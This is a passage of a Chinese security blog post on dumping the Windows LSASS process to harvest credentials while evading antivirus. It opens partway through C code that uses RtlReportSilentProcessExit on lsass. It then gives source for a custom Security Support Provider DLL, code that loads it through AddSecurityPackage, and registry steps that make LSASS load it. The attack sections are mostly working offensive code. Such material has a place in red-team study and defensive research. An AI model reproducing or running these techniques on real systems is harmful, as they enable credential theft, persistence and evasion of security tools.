(fRtlReportSilentProcessExit)GetProcAddress(hNtMod, <span class="string">"RtlReportSilentProcessExit"</span>);</div><div class="line">		<span class="keyword">if</span> (!fnRtlReportSilentProcessExit) &#123;</div><div class="line">			<span class="keyword">printf</span>(<span class="string">"[!]Get RtlReportSilentProcessExit\n"</span>);</div><div class="line">			<span class="keyword">break</span>;</div><div class="line">		&#125;</div><div class="line">		<span class="keyword">printf</span>(<span class="string">"[+] RtlReportSilentProcessExit地址: %X\n"</span>, (DWORD)fnRtlReportSilentProcessExit);</div><div class="line">		hLsassProc = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_VM_READ, <span class="number">0</span>, pid);</div><div class="line">		<span class="keyword">if</span> (!hLsassProc) &#123;</div><div class="line">			<span class="keyword">printf</span>(<span class="string">"[!] OpenProcess: %X\n"</span>, GetLastError());</div><div class="line">			<span class="keyword">break</span>;</div><div class="line">		&#125;</div><div class="line">		<span class="keyword">printf</span>(<span class="string">"[+] OpenProcess: %X\n"</span>, (DWORD)hLsassProc);</div><div class="line">		ntStatus = fnRtlReportSilentProcessExit(hLsassProc, <span class="number">0</span>);</div><div class="line">	&#125; <span class="keyword">while</span> (false);</div><div class="line">	<span class="keyword">if</span> (hNtMod)</div><div class="line">		CloseHandle(hNtMod);</div><div class="line">	<span class="keyword">if</span> (fnRtlReportSilentProcessExit)</div><div class="line">		CloseHandle(fnRtlReportSilentProcessExit);</div><div class="line">	<span class="keyword">if</span> (hLsassProc)</div><div class="line">		CloseHandle(hLsassProc);</div><div class="line">	<span class="keyword">if</span> (fnRtlReportSilentProcessExit)</div><div class="line">		fnRtlReportSilentProcessExit = NULL;</div><div class="line">	<span class="keyword">return</span> <span class="number">0</span>;</div><div class="line">&#125;</div></pre></td></tr></table></figure></p>
<h2 id="0x04-LSASS-SSP自加载"><a href="#0x04-LSASS-SSP自加载" class="headerlink" title="0x04 LSASS SSP自加载"></a>0x04 LSASS SSP自加载</h2><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;SSP，全称Security Support Provider，又名Security Package。针对绕过卡巴斯基的LSASS Dump可以使用<code>SSP</code>+<code>MiniDumpWriteDump</code>的方式。</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package" target="_blank" rel="external">Intercepting Logon Credentials via Custom Security Support Provider and Authentication Packages</a>一文中提供了如何编写一个可以使用的SSP dll文件。3gstudent在他的<a href="https://3gstudent.github.io/Mimikatz中SSP的使用" target="_blank" rel="external">Mimikatz中SSP的使用</a>介绍了SSP的基本原理和如何添加SSP的三种方法。</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;SSP是一个dll，不同的功能对应不同的导出函数。具体可以参见下面的代码。该代码主要包含5个函数</p>
<ul>
<li>SpInitialize 用于初始化SSP并提供函数指针列表，此处可以直接返回</li>
<li>SpShutDown 用于卸载SSP，暂时无法卸载。</li>
<li>SpGetInfo 提供有关SSP的信息，包括版本，名称和说明</li>
<li>SpAcceptCredentials 可以执行的操作。</li>
<li>SpLsaModeInitialize 导出函数。</li>
</ul>
<figure class="highlight zephir"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div></pre></td><td class="code"><pre><div class="line">NTSTATUS NTAPI SpInitialize(ULONG_PTR PackageId, PSECPKG_PARAMETERS Parameters, PLSA_SECPKG_FUNCTION_TABLE FunctionTable) </div><div class="line">&#123; </div><div class="line">	<span class="keyword">return</span> <span class="number">0</span>;</div><div class="line">&#125;</div><div class="line">NTSTATUS NTAPI SpShutDown(void) </div><div class="line">&#123; </div><div class="line">	<span class="keyword">return</span> <span class="number">0</span>; </div><div class="line">&#125;</div><div class="line">NTSTATUS NTAPI SpGetInfo(PSecPkgInfoW PackageInfo)</div><div class="line">&#123; </div><div class="line">	PackageInfo-&gt;fCapabilities = SECPKG_FLAG_ACCEPT_WIN32_NAME | SECPKG_FLAG_CONNECTION;</div><div class="line">	PackageInfo-&gt;wVersion = <span class="number">1</span>;</div><div class="line">	PackageInfo-&gt;wRPCID = SECPKG_ID_NONE;</div><div class="line">	PackageInfo-&gt;cbMaxToken = <span class="number">0</span>;</div><div class="line">	PackageInfo-&gt;Name = L<span class="string">"KiwiSSP"</span>;</div><div class="line">	PackageInfo-&gt;Comment = L<span class="string">"Kiwi Security Support Provider"</span>;</div><div class="line">	<span class="keyword">return</span> <span class="number">0</span>;</div><div class="line">&#125;</div><div class="line">NTSTATUS NTAPI SpAcceptCredentials(SECURITY_LOGON_TYPE LogonType, PUNICODE_STRING AccountName, PSECPKG_PRIMARY_CRED PrimaryCredentials, PSECPKG_SUPPLEMENTAL_CRED SupplementalCredentials)</div><div class="line">&#123;</div><div class="line">	<span class="keyword">if</span> (flag == <span class="keyword">FALSE</span>)</div><div class="line">		ProcessMain();  <span class="comment">//可以执行的操作</span></div><div class="line">	<span class="keyword">return</span> <span class="number">0</span>;</div><div class="line">&#125;</div><div class="line">SECPKG_FUNCTION_TABLE SecurityPackageFunctionTable[] =</div><div class="line">&#123;</div><div class="line">	&#123;</div><div class="line">		<span class="keyword">NULL</span>, <span class="keyword">NULL</span>, <span class="keyword">NULL</span>, <span class="keyword">NULL</span>, <span class="keyword">NULL</span>, <span class="keyword">NULL</span>, <span class="keyword">NULL</span>, <span class="keyword">NULL</span>,	SpInitialize, SpShutDown, SpGetInfo, SpAcceptCredentials, <span class="keyword">NULL</span>, <span class="keyword">NULL</span>, <span class="keyword">NULL</span>, <span class="keyword">NULL</span>, <span class="keyword">NULL</span>, <span class="keyword">NULL</span>, <span class="keyword">NULL</span>, <span class="keyword">NULL</span>, <span class="keyword">NULL</span>, <span class="keyword">NULL</span>, <span class="keyword">NULL</span>, <span class="keyword">NULL</span>, <span class="keyword">NULL</span>, <span class="keyword">NULL</span>, <span class="keyword">NULL</span></div><div class="line">	&#125;</div><div class="line">&#125;;</div><div class="line"><span class="comment">// SpLsaModeInitialize is called by LSA for each registered Security Package</span></div><div class="line">extern <span class="string">"C"</span> __declspec(dllexport) NTSTATUS NTAPI SpLsaModeInitialize(<span class="keyword">ULONG</span> LsaVersion, PULONG PackageVersion, PSECPKG_FUNCTION_TABLE *ppTables, PULONG pcTables)</div><div class="line">&#123;</div><div class="line">	*PackageVersion = SECPKG_INTERFACE_VERSION;</div><div class="line">	*ppTables = SecurityPackageFunctionTable;</div><div class="line">	*pcTables = <span class="number">1</span>;</div><div class="line">	<span class="keyword">return</span> <span class="number">0</span>;</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;添加SSP主要有三种方法。</p>
<ul>
<li><p>方法一:等待重启</p>
<figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">(1) 将ssp.dll复制到c:<span class="symbol">\w</span>indows<span class="symbol">\s</span>ystem32</div><div class="line">(2) 修改HKEY_LOCAL_MACHINE<span class="symbol">\S</span>ystem<span class="symbol">\C</span>urrentControlSet<span class="symbol">\C</span>ontrol<span class="symbol">\L</span>sa<span class="symbol">\的</span>Security Packages的值设置为ssp.dll</div><div class="line">(3) 等待系统重新启动</div></pre></td></tr></table></figure>
</li>
<li><p>方法二：调用AddSecurityPackage</p>
<figure class="highlight autoit"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div></pre></td><td class="code"><pre><div class="line">(<span class="number">1</span>)(<span class="number">2</span>)同方法一</div><div class="line">(<span class="number">3</span>)调用AddSecurityPackage</div><div class="line">//测试代码如下</div><div class="line">//<span class="meta">#define SECURITY_WIN32</span></div><div class="line">//<span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></div><div class="line">//<span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;Windows.h&gt;</span></span></div><div class="line">//<span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;Security.h&gt;</span></span></div><div class="line">//<span class="meta">#<span class="meta-keyword">pragma</span> comment(lib,<span class="string">"Secur32.lib"</span>)</span></div><div class="line"><span class="built_in">int</span> main(<span class="built_in">int</span> argc, char **argv) </div><div class="line">&#123;</div><div class="line">	SECURITY_PACKAGE_OPTIONS option<span class="comment">;</span></div><div class="line">	option.Size = sizeof(option)<span class="comment">;</span></div><div class="line">	option.Flags = <span class="number">0</span><span class="comment">;</span></div><div class="line">	option.Type = SECPKG_OPTIONS_TYPE_LSA<span class="comment">;</span></div><div class="line">	option.SignatureSize = <span class="number">0</span><span class="comment">;</span></div><div class="line">	option.Signature = <span class="literal">NULL</span><span class="comment">;</span></div><div class="line">	SECURITY_STATUS SEC_ENTRYnRet = AddSecurityPackageA(<span class="string">"mimilib"</span>, &amp;option)<span class="comment">;</span></div><div class="line">	<span class="keyword">return</span> <span class="number">0</span><span class="comment">;</span></div><div class="line">&#125;</div></pre></td></tr></table></figure>
</li>
<li><p>方法三:使用RPC控制lsass加载SSP:这个方法的优势在于无需有过多敏感的痕迹(写注册表，调用AddSecurityPackage，不需要对lsass进程的内存进行写操作，lasss进程中不存在加载的dll)，这个方法是XPN大佬发现的，其开源在他的<a href="https://gist.github.com/xpn/c7f6d15bf15750eae3ec349e7ec2380e" target="_blank" rel="external">github</a>中，并在他的博文<a href="https://blog.xpnsec.com/exploring-mimikatz-part-2/" target="_blank" rel="external">exploring-mimikatz-part-2/</a>一文中有详细的介绍，其大概意思就是通过逆向分析AddSecurityPackage API函数，发现内部是通过RPC调用实现加载SSP.dll的。</p>
</li>
</ul>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;经过测试使用SSP+MiniDumpWriteDump回调的方式会造成系统卡死，原因，和@seventeen师傅了解了，可能是巨硬家使用SSP并不支持回调。所以我直接使用SSP+MiniDumpWriteDump，并没有采用回调方式可以成功转储。</p>
<h2 id="参考文献"><a href="#参考文献" class="headerlink" title="参考文献"></a>参考文献</h2><p>[+] 1. <a href="https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf" target="_blank" rel="external">Some ways to dump LSASS.exe</a></p>
<p>[+] 2. <a href="https://xz.aliyun.com/t/10107" target="_blank" rel="external">几种免杀转储lsass进程的技巧</a> </p>
<p>[+] 3. <a href="https://forum.butian.net/share/887" target="_blank" rel="external">静默退出 DUMP LSASS.EXE</a></p>
<p>[+] 4. <a href="https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package" target="_blank" rel="external">Intercepting Logon Credentials via Custom Security Support Provider and Authentication Packages</a></p>
<p>[+] 5. <a href="https://3gstudent.github.io/Mimikatz中SSP的使用" target="_blank" rel="external">Mimikatz中SSP的使用</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2022/12/20/ATT&CK防御规避/" rel="next" title="ATT&CK 防御规避">
                <i class="fa fa-chevron-left"></i> ATT&CK 防御规避
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2023/02/08/CVE-2018-8120内核提权漏洞分析/" rel="prev" title="CVE-2018-8120 内核提权漏洞分析">
                CVE-2018-8120 内核提权漏洞分析 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">HaCky</p>
              <p class="site-description motion-element" itemprop="description">我是最菜的HaCky呀</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">88</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                
                  <span class="site-state-item-count">21</span>
                  <span class="site-state-item-name">分类</span>
                
              </div>
            

            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          <div class="links-of-author motion-element">
            
          </div>

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-现成工具"><span class="nav-number">1.</span> <span class="nav-text">0x01 现成工具</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-本机API或者Dll"><span class="nav-number">2.</span> <span class="nav-text">0x02 本机API或者Dll</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-RtlReportSilentProcessExit静默进程退出"><span class="nav-number">3.</span> <span class="nav-text">0x03 RtlReportSilentProcessExit静默进程退出</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-LSASS-SSP自加载"><span class="nav-number">4.</span> <span class="nav-text">0x04 LSASS SSP自加载</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考文献"><span class="nav-number">5.</span> <span class="nav-text">参考文献</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">HaCky</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.3</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>

  
  <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  












  





  

  

  
  

  

  

  

</body>
</html>
